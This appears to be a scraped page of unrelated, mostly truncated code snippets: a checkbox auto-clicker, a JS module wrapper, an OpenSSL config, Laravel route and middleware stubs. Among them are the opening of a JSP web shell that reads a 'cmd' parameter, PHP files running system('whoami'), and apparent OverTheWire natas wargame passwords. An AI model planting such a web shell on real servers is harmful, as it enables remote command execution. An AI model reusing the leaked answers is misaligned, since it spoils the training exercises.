This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const checkboxes = document.querySelectorAll("input[type='checkbox'][data-purpose='progress-toggle-button']"); | |
for (let i = 0; i < checkboxes.length; i++) { | |
checkboxes[i].click(); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
!function(e) { | |
if ("object" == typeof exports && "undefined" != typeof module) | |
module.exports = e(); | |
else if ("function" == typeof define && define.amd) | |
define([], e); | |
else { | |
("undefined" != typeof window ? window : "undefined" != typeof global ? global : "undefined" != typeof self ? self : this).frameService = e() | |
} | |
}((function() { | |
return function e(t, n, r) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# OpenSSL example configuration file. | |
# This is mostly being used for generation of certificate requests. | |
# | |
# This definition stops the following lines choking if HOME isn't | |
# defined. | |
HOME = . | |
RANDFILE = $ENV::HOME/.rnd |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<FORM METHOD=GET ACTION='index.jsp'> | |
<INPUT name='cmd' type=text> | |
<INPUT type=submit value='Run'> | |
</FORM> | |
<%@ page import="java.io.*" %> | |
<% | |
String cmd = request.getParameter("cmd"); | |
String output = ""; | |
if(cmd != null) { | |
String s = null; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
system("whoami"); | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
system("whoami"); | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://tinyurl.com/secedu1 (natas2 - ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi) | |
https://tinyurl.com/secedu2 (natas3 - sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14) | |
https://tinyurl.com/secedu5 (natas9 - W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl) | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//test |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// You can define a spesific route | |
Route::get('user/{id}/profile', ['middleware'=>'acl','as' => 'UserProfile', function ($id) { | |
// | |
}]); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
namespace App\Http\Middleware; | |
use Closure; | |
class CheckPermission | |
{ | |
/** | |
* Handle an incoming request. | |
* | |
* @param \Illuminate\Http\Request $request | |
* @param \Closure $next |
NewerOlder